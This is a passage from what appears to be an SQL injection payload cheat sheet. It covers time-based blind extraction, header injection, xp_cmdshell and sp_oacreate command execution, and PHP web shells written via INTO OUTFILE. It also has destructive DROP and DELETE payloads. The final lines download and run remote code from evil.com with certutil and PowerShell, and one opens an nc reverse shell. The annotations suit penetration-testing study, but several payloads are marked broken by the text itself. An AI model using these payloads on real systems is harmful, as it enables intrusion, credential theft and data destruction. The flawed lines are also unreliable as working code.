' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 2)=2,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 1)=1,5,0))--

# Time-based data length extraction
' AND SLEEP(IF(LENGTH((SELECT database()))>5,5,0))--
' AND pg_sleep(CASE WHEN LENGTH((SELECT database()))>5 THEN 5 ELSE 0 END)--
' AND SLEEP(IF(LENGTH((SELECT password FROM users WHERE username='admin'))>10,5,0))--

# Time-based counting queries
' AND SLEEP(IF((SELECT COUNT(*) FROM users)>10,5,0))--
' AND pg_sleep(CASE WHEN (SELECT COUNT(*) FROM information_schema.tables)>5 THEN 5 ELSE 0 END)--
' WAITFOR DELAY CASE WHEN (SELECT COUNT(*) FROM users)>0 THEN '00:00:05' ELSE '00:00:00' END--

# Time-based version detection
' AND SLEEP(IF(SUBSTRING(VERSION(),1,1)='5',5,0))--
' AND pg_sleep(CASE WHEN SUBSTRING(VERSION(),1,1)='9' THEN 5 ELSE 0 END)--
' WAITFOR DELAY CASE WHEN @@VERSION LIKE '%SQL Server%' THEN '00:00:05' ELSE '00:00:00' END--

# Time-based user privilege detection
' AND SLEEP(IF((SELECT COUNT(*) FROM information_schema.user_privileges WHERE grantee LIKE '%admin%')>0,5,0))--
' AND pg_sleep(CASE WHEN (SELECT super_priv FROM mysql.user WHERE user='root')='Y' THEN 5 ELSE 0 END)--

# Time-based file existence check
' AND SLEEP(IF((SELECT COUNT(*) FROM information_schema.files WHERE file_name='/etc/passwd'))>0,5,0))--
' AND pg_sleep(CASE WHEN (SELECT file_exists('/etc/passwd'))=1 THEN 5 ELSE 0 END)--

# Advanced time-based techniques
' AND SLEEP(IF(ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)) BETWEEN 97 AND 122,5,0))--
' AND pg_sleep(CASE WHEN ASCII(SUBSTRING((SELECT database()),1,1)) IN (115, 116, 117) THEN 5 ELSE 0 END)--
' AND SLEEP(IF((SELECT database()) LIKE 't%',5,0))--
' AND pg_sleep(CASE WHEN (SELECT database()) LIKE '%test%' THEN 5 ELSE 0 END)--

# Time-based with mathematical operations
' AND SLEEP(IF((SELECT COUNT(*) FROM users)*2>10,5,0))--
' AND pg_sleep(CASE WHEN (SELECT COUNT(*) FROM information_schema.tables)/2>3 THEN 5 ELSE 0 END)--
' AND SLEEP(IF(LENGTH((SELECT database()))*2>10,5,0))--

# Stacked queries with time delays
'; SELECT SLEEP(5)--
'; WAITFOR DELAY '00:00:05'--
'; SELECT pg_sleep(5)--
'; EXEC('WAITFOR DELAY ''00:00:05''')--
'; EXEC('SELECT SLEEP(5)')--

# Time-based injection with HTTP parameter pollution
id=1' AND SLEEP(5) &id=2' AND SLEEP(5)--
username=admin' AND SLEEP(5) &username=test' AND SLEEP(5)--
password=' AND SLEEP(5) &password=' AND SLEEP(10)--

# Cookie-based time injection
Cookie: sessionid=' AND SLEEP(5)--
Cookie: user_id=' OR pg_sleep(5)--
Cookie: auth=' WAITFOR DELAY '00:00:05'--

# User-Agent time injection
User-Agent: ' AND SLEEP(5)--
User-Agent: ' OR pg_sleep(5)--
User-Agent: ' WAITFOR DELAY '00:00:05'--

# Referer time injection
Referer: ' AND SLEEP(5)--
Referer: ' OR pg_sleep(10)--
Referer: ' WAITFOR DELAY '00:00:05'--

# X-Forwarded-For time injection
X-Forwarded-For: ' AND SLEEP(5)--
X-Forwarded-For: ' OR pg_sleep(5)--
X-Forwarded-For: ' WAITFOR DELAY '00:00:05'--

# Error-based time delays (combining error and time)
' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(VERSION(), SLEEP(5)) x FROM information_schema.tables GROUP BY x) a)--
' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(database(), SLEEP(5)) x FROM users GROUP BY x) a)--

📝 Injections SQL de Procédures Stockées sql

🔴 complex ⭐⭐⭐⭐⭐

Injection SQL via des procédures stockées - xp_cmdshell, sp_oacreate, opérations de fichiers et exécution avancée de commandes de base de données

⏱️ 40 min 🏷️ sql, stored procedures, injection, database, advanced
# Stored Procedure SQL Injection Vectors
# SQL injection through stored procedures and database functions

# SQL Server xp_cmdshell injections
' EXEC xp_cmdshell('dir')--
'; EXEC xp_cmdshell('dir')--
' EXEC xp_cmdshell('net user hacker password /add')--
'; EXEC xp_cmdshell('net user hacker password /add')--
' EXEC xp_cmdshell('ping evil.com')--
'; EXEC xp_cmdshell('ping evil.com')--
' EXEC xp_cmdshell('ipconfig')--
'; EXEC xp_cmdshell('whoami')--

# SQL Server master database procedures
' EXEC master..xp_cmdshell 'dir'--
'; EXEC master..xp_cmdshell 'ping evil.com'--
' EXEC master..sp_configure 'show advanced options', 1--
'; EXEC master..sp_configure 'show advanced options', 1; RECONFIGURE;--
' EXEC master..sp_configure 'xp_cmdshell', 1--
'; EXEC master..sp_configure 'xp_cmdshell', 1; RECONFIGURE;--

# SQL Server sp_oacreate injections
' DECLARE @shell INT EXEC sp_oacreate 'wscript.shell', @shell OUTPUT EXEC sp_oamethod @shell, 'run', NULL, 'cmd.exe /c dir'--
'; DECLARE @shell INT EXEC sp_oacreate 'wscript.shell', @shell OUTPUT EXEC sp_oamethod @shell, 'run', NULL, 'cmd.exe /c ping evil.com'--

# SQL Server sp_adduser injections
' EXEC sp_adduser 'hacker', 'password'--
'; EXEC sp_adduser 'admin', 'password123'--

# MySQL stored procedure injections
' CALL shell('dir')--
'; CALL shell('ls -la')--
' DO SLEEP(5)--
'; DO SLEEP(10)--
' EXECUTE immediate 'SLEEP(5)'--

# Oracle stored procedure injections
' EXEC DBMS_PIPE.RECEIVE_MESSAGE('x', 5)--
'; EXEC DBMS_PIPE.RECEIVE_MESSAGE('x', 10)--
' EXEC DBMS_LOCK.SLEEP(5)--
'; EXEC DBMS_LOCK.SLEEP(10)--
' EXEC DBMS_SQLHASH.HASH('test')--
'; EXEC DBMS_RANDOM.STRING('a', 10)--

# PostgreSQL stored procedure injections
' SELECT pg_sleep(5)--
'; SELECT pg_sleep(10)--
' EXECUTE 'SELECT pg_sleep(5)'--
'; EXECUTE 'SELECT pg_sleep(10)'--
' SELECT dbms_pipe.receive_message('x', 5)--

# INTO OUTFILE injections (MySQL)
# Requires the FILE privilege and is restricted by secure_file_priv (a fixed
# directory, or disabled entirely when NULL). The file is written by the mysqld
# OS user, who rarely has write access to the web root, and an existing file
# is never overwritten. The lines beginning with '; UNION SELECT' are invalid:
# UNION cannot start a statement, so either continue the original SELECT with
# ' UNION SELECT ... or use a stacked '; SELECT ... INTO OUTFILE'.
' UNION SELECT 1,2,3 INTO OUTFILE '/var/www/html/shell.php'--
'; UNION SELECT NULL, '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/cmd.php'--
' UNION SELECT NULL, NULL, NULL INTO OUTFILE '/tmp/test.txt'--
'; SELECT * FROM users INTO OUTFILE '/var/www/html/users.txt'--

# INTO DUMPFILE injections (MySQL)
# Same FILE / secure_file_priv restrictions as INTO OUTFILE; DUMPFILE writes a
# single value without escaping or line terminators, which is why it is used
# for script or binary content. The '; UNION SELECT' line is invalid (UNION
# cannot start a statement) — use ' UNION SELECT ... INTO DUMPFILE ...' instead.
' UNION SELECT 1,2 INTO DUMPFILE '/var/www/html/test.txt'--
'; UNION SELECT '<?php phpinfo(); ?>' INTO DUMPFILE '/var/www/html/info.php'--

# LOAD_FILE injections (MySQL)
# Also needs the FILE privilege and honours secure_file_priv; the file must be
# readable by the mysqld OS user and smaller than max_allowed_packet, otherwise
# LOAD_FILE returns NULL (so /etc/shadow normally yields NULL). The
# '; UNION SELECT' line is invalid because UNION cannot start a statement.
' UNION SELECT LOAD_FILE('/etc/passwd')--
'; UNION SELECT LOAD_FILE('C:/Windows/win.ini')--
' UNION SELECT LOAD_FILE('/var/www/html/config.php')--
'; SELECT LOAD_FILE('/etc/shadow')--

# BCP utility injections (SQL Server)
# Runs the bcp client through xp_cmdshell, so it needs xp_cmdshell enabled and
# bcp installed on the server. '-T' authenticates with the Windows identity of
# the SQL Server service account; the output path is on the database host.
' EXEC master..xp_cmdshell 'bcp "SELECT * FROM users" queryout C:\\Users\\Public\\users.txt -c -T'--
'; EXEC master..xp_cmdshell 'bcp database.dbo.users queryout C:\\Users\\Public\\users.txt -c -T'--

# OPENROWSET injections (SQL Server)
# Ad hoc OPENROWSET / OPENDATASOURCE calls require the 'Ad Hoc Distributed
# Queries' option to be enabled (off by default). Pointing a
# Trusted_Connection at an attacker-controlled host makes the server
# authenticate outbound with its service account's Windows credentials, so this
# doubles as an out-of-band / credential-capture vector even when no data comes
# back. The Jet provider line appears illustrative only: Jet 4.0 is 32-bit and
# its text driver takes a directory plus Extended Properties='Text', not a
# file path and table name — verify on the target.
' UNION SELECT * FROM OPENROWSET('SQLOLEDB', 'Server=evil.com;Trusted_Connection=yes;', 'SELECT * FROM users')--
'; SELECT * FROM OPENROWSET('Microsoft.Jet.OLEDB.4.0', 'C:\\Windows\\system32\\drivers\\etc\\hosts', 'SELECT * FROM hosts')--

# OPENJSON injections (SQL Server 2016+)
# Not injection primitives by themselves: OPENJSON / FOR JSON PATH (database
# compatibility level 130 or higher) only reshape data the current user can
# already read, which is handy for pulling a whole table through one column.
# The second line returns credential material — handle it per your engagement
# rules.
' SELECT * FROM OPENJSON((SELECT * FROM users FOR JSON PATH))--
'; SELECT * FROM OPENJSON((SELECT username, password FROM users FOR JSON PATH))--

# EXECUTE with dynamic SQL
# Inside EXEC('...') the inner statement is a string, so each single quote is
# written as two. The two username examples over-escape: '''admin''' and
# ''''admin'''' do not yield username='admin' in the inner statement (the first
# even closes the outer string early). The working form is
# EXEC('SELECT password FROM users WHERE username=''admin''')--
# The DROP TABLE line is destructive.
' EXEC('SELECT * FROM users')--
'; EXEC('SELECT * FROM admins WHERE username='''admin'''')--
' EXEC('SELECT password FROM users WHERE username=''''admin'''')--
'; EXEC('DROP TABLE users')--

# EXECUTE with user input
# These two lines are code-review patterns, not payloads: @input is a variable
# inside a stored procedure, so they do nothing when injected. The second line
# is the vulnerable shape (user input concatenated into the SQL string). The
# first doubles single quotes with REPLACE, which blocks the plain quote escape
# but is still string-built SQL — the robust fix is a parameterised call
# through sp_executesql (next section).
'; EXEC('SELECT * FROM users WHERE username=''' + REPLACE(@input, '''', '''''') + '''')--
'; DECLARE @sql NVARCHAR(1000); SET @sql = 'SELECT * FROM users WHERE username=''' + @input + ''''; EXEC(@sql)--

# sp_executesql injections (SQL Server)
# The first and third lines are the defensive form: the value is passed as a
# typed parameter and never concatenated into the statement. They show what
# safe dynamic SQL looks like rather than exploit anything. Only the second
# line is a raw stacked query. The DELETE is destructive.
' EXEC sp_executesql N'SELECT * FROM users WHERE username = @name', N'@name VARCHAR(100)', @name = 'admin'--
'; EXEC sp_executesql N'SELECT * FROM users'--
' EXEC sp_executesql N'DELETE FROM users WHERE id = @id', N'@id INT', @id = 1--

# MySQL EXECUTE with prepared statements
# The first line is the vulnerable pattern inside a stored routine (user input
# concatenated with CONCAT, then PREPARE/EXECUTE); as an injected payload it
# needs multi-statements enabled and @input already set. The safe variant keeps
# a '?' placeholder in the statement and binds the value with EXECUTE stmt
# USING @value.
' SET @sql = CONCAT('SELECT * FROM users WHERE username = ''', @input, ''''); PREPARE stmt FROM @sql; EXECUTE stmt;--
'; SET @sql = 'SELECT * FROM users'; PREPARE stmt FROM @sql; EXECUTE stmt; DEALLOCATE PREPARE stmt;--

# PostgreSQL EXECUTE with dynamic queries
# EXECUTE '...' USING is PL/pgSQL and only runs inside a function or DO block;
# the first two lines fail at the SQL level. The DO block is also broken: DO
# blocks take no parameters, so $1 is undefined. quote_literal() (or
# format('%L', ...)) is the correct escaping; binding through USING is safer.
' EXECUTE 'SELECT * FROM users WHERE username = $1' USING 'admin'--
'; EXECUTE 'SELECT * FROM users'--
' DO $$ BEGIN EXECUTE 'SELECT * FROM users WHERE username = ' || quote_literal($1) USING 'admin'; END $$;--

# Oracle EXECUTE IMMEDIATE
# EXECUTE IMMEDIATE is PL/SQL, so it must sit inside a BEGIN ... END; block as
# in the third line; the first two are not valid SQL on their own, and stacked
# statements are generally unavailable in Oracle anyway. The third line is in
# fact the safe form — the value is bound with USING rather than concatenated.
# The DROP TABLE line is destructive.
' EXECUTE IMMEDIATE 'SELECT * FROM users WHERE username = ''admin'''--
'; EXECUTE IMMEDIATE 'DROP TABLE users'--
' BEGIN EXECUTE IMMEDIATE 'SELECT password FROM users WHERE username = :name' USING 'admin'; END;--

# Database link injections (Oracle)
# The two lines showing [email protected] were mangled by the page's e-mail
# obfuscation; read them as users@remote_db like the other two. A link only
# works if it already exists and the caller may use it; the INSERT and DELETE
# lines modify data on the remote database.
' UNION SELECT * FROM [email protected]
'; SELECT * FROM users@remote_db--
' INSERT INTO [email protected] VALUES ('hacker', 'password')--
'; DELETE FROM users@remote_db WHERE username='admin'--

# Database link injections (PostgreSQL)
# dblink is a contrib extension (CREATE EXTENSION dblink) and is not installed
# by default. The connection string makes the database server open an outbound
# connection to the named host, which is an out-of-band / SSRF check even when
# the query returns nothing. postgres_fdw is a foreign-data wrapper, not a
# callable function — it is used through CREATE SERVER / CREATE FOREIGN TABLE,
# so the second line fails as written.
' SELECT * FROM dblink('host=evil.com user=hacker password=secret', 'SELECT * FROM users') AS t1(id INT, username VARCHAR, password VARCHAR)--
'; SELECT * FROM postgres_fdw('SELECT * FROM users')--

# Database link injections (SQL Server)
# Same requirements and risk as the OPENROWSET section: 'Ad Hoc Distributed
# Queries' must be enabled, and Trusted_Connection / Integrated Security=SSPI
# towards an external host sends the service account's Windows credentials.
' SELECT * FROM OPENROWSET('SQLNCLI', 'Server=evil.com;Trusted_Connection=yes;', 'SELECT * FROM users')--
'; SELECT * FROM OPENDATASOURCE('SQLNCLI', 'Data Source=evil.com;Integrated Security=SSPI').database.dbo.users--

# Bulk insert injections (SQL Server)
# BULK INSERT needs INSERT on the table plus ADMINISTER BULK OPERATIONS
# (bulkadmin). The path is resolved on the database server by its service
# account, so the file must already exist there (e.g. dropped via bcp or
# xp_cmdshell above).
' BULK INSERT users FROM 'C:\\Users\\Public\\users.txt'--
'; BULK INSERT admins FROM 'C:\\Users\\Public\\admins.txt' WITH (FIELDTERMINATOR = ',')--

# SQL injection with IF statements in stored procedures
# T-SQL control flow via stacked queries. The third line references an
# undeclared @condition and errors out; the first two drop the users table.
'; IF EXISTS(SELECT * FROM users WHERE username='admin') DROP TABLE users--
'; IF (SELECT COUNT(*) FROM users) > 0 DROP TABLE users--
'; IF @condition = 'true' BEGIN DROP TABLE users END--

# SQL injection with WHILE loops in stored procedures
# The first loop deletes every row of users one at a time; the second inserts
# ten rows into logs. DECLARE @i INT = 1 inline initialisation needs SQL Server
# 2008 or later.
'; WHILE EXISTS(SELECT * FROM users) BEGIN DELETE TOP (1) FROM users END--
'; DECLARE @i INT = 1; WHILE @i <= 10 BEGIN INSERT INTO logs (message) VALUES ('test'); SET @i = @i + 1; END--

# SQL injection with CASE statements in stored procedures
# The SELECT is a harmless boolean probe; the UPDATE overwrites the admin
# password with the literal 'newpass' (it assumes the column holds plain text).
'; SELECT CASE WHEN (SELECT COUNT(*) FROM users) > 0 THEN 'true' ELSE 'false' END--
'; UPDATE users SET password = CASE WHEN username = 'admin' THEN 'newpass' ELSE password END--

# SQL injection with CURSOR in stored procedures
# Demonstrates that full T-SQL batches execute via stacked queries; without
# FETCH ... INTO the single FETCH NEXT returns the first username as a result
# set, so this is a syntax / permission probe more than an extraction payload.
'; DECLARE cursor_users CURSOR FOR SELECT username FROM users; OPEN cursor_users; FETCH NEXT FROM cursor_users; CLOSE cursor_users; DEALLOCATE cursor_users;--

# SQL injection with TRANSACTION in stored procedures
# The first batch commits a DROP TABLE; the second rolls back, so the UPDATE
# leaves no change but still exercises write access — a lower-impact way to
# confirm it.
'; BEGIN TRANSACTION; DROP TABLE users; COMMIT;--
'; BEGIN TRAN; UPDATE users SET password = 'hacked'; ROLLBACK;--

# SQL injection with TRY/CATCH in stored procedures
# Wrapping a destructive statement in TRY/CATCH surfaces ERROR_MESSAGE() even
# when the application hides errors. The semicolons directly after BEGIN TRY
# and BEGIN CATCH look suspect (T-SQL does not normally accept an empty
# statement there) — verify before use.
'; BEGIN TRY; DROP TABLE users; END TRY; BEGIN CATCH; SELECT ERROR_MESSAGE(); END CATCH;--

# xp_servicecontrol injections (SQL Server)
# Undocumented extended procedure that starts / stops Windows services on the
# database host; needs sysadmin. 'Schedule' is the Task Scheduler service and
# 'mssearch' the legacy full-text search service.
' EXEC xp_servicecontrol 'start', 'Schedule'--
'; EXEC master..xp_servicecontrol 'start', 'mssearch'--

# xp_regread injections (SQL Server)
# Undocumented registry read; execution rights are limited to privileged roles
# and certain registry paths, so expect permission errors from low-privileged
# accounts. The second line returns the Windows product name — a safe
# host-fingerprinting probe.
' EXEC xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum', '0'--
'; EXEC master..xp_regread 'HKEY_LOCAL_MACHINE', 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion', 'ProductName'--

# xp_replwritetovarbin with payload (SQL Server)
# Placeholder, not a working exploit: the hex blob is truncated and the
# vulnerable procedure is sp_replwritetovarbin (heap overflow, MS09-004 /
# CVE-2008-5416, SQL Server 2000/2005), which was patched in 2009 and is not
# present in supported versions. Keep only as a historical reference.
' DECLARE @data VARCHAR(8000); SELECT @data = 0x44005700...; EXEC xp_replwritetovarbin @data--

# sp_makewebtask injections (SQL Server 2000)
# Web Assistant procedure from SQL Server 2000; off by default in 2005 and
# removed in later versions. The first line writes ASP markup (<% %>) into a
# .php file, so the server-side code would not execute even if the file landed
# in an IIS web root — the markup and the extension need to agree.
' EXEC sp_makewebtask 'C:\\Inetpub\\wwwroot\\shell.php', 'SELECT "<%=Server.CreateObject(""WScript.Shell"").Exec(""cmd.exe /c dir"")%>"'--
'; EXEC sp_makewebtask '\\evil.com\\share\\shell.php', 'SELECT "<?php system($_GET[""cmd""]); ?>"'--

# xp_sendmail injections (SQL Server)
# Legacy SQL Mail, which needs a MAPI profile and was removed from SQL Server
# 2012 onward; current servers use Database Mail (sp_send_dbmail). The
# recipient address was mangled by the page's e-mail obfuscation. A subquery is
# not a valid procedure argument, so the second line must assign the FOR XML
# result to a variable first.
' EXEC xp_sendmail @recipients = '[email protected]', @message = 'Database compromised'--
'; EXEC master..xp_sendmail @recipients = '[email protected]', @subject = 'SQL Injection Success', @message = (SELECT * FROM users FOR XML PATH)--

# MySQL CREATE FUNCTION injections
# Loads a UDF from the server's plugin_dir, so the shared library must already
# be on the database host (typically written there via INTO DUMPFILE with the
# FILE privilege) and the caller needs INSERT on the mysql system database.
# The function name must match a symbol exported by the library: stock
# lib_mysqludf_sys exports sys_exec, sys_eval, sys_get and sys_set, not shell
# or do_system.
'; CREATE FUNCTION shell() RETURNS INT SONAME 'lib_mysqludf_sys.so'--
'; CREATE FUNCTION do_system RETURNS INTEGER SONAME 'lib_mysqludf_sys.so'; SELECT do_system('id');--

# MySQL UDF injection
# CREATE UDF FUNCTION is not valid syntax — the loadable-function form is
# CREATE FUNCTION name RETURNS INTEGER SONAME 'lib.so' as in the previous
# section. The nc reverse shell only applies if the library actually exports
# do_system (stock lib_mysqludf_sys uses sys_exec / sys_eval).
'; CREATE UDF FUNCTION do_system RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';--
'; SELECT do_system('nc -e /bin/sh evil.com 4444');--

# Advanced stored procedure payload execution
# All three spawn cmd.exe / certutil / powershell as children of sqlservr.exe,
# and the second and third make outbound HTTP requests — the highest-signal
# behaviour an EDR or SIEM will flag, so expect detection on any monitored
# host. They also drop files into the web root or the Public folder, which
# must be cleaned up after a test.
'; EXEC master..xp_cmdshell 'echo ^<?php system($_GET["cmd"]); ?^> > C:\\Inetpub\\wwwroot\\cmd.php'--
'; EXEC master..xp_cmdshell 'certutil -urlcache -split -f "http://evil.com/shell.exe" C:\\Users\\Public\\shell.exe && C:\\Users\\Public\\shell.exe'--
'; DECLARE @cmd VARCHAR(1000); SET @cmd = 'powershell -c "IEX (New-Object Net.WebClient).DownloadString(''http://evil.com/payload.ps1'')"'; EXEC master..xp_cmdshell @cmd;--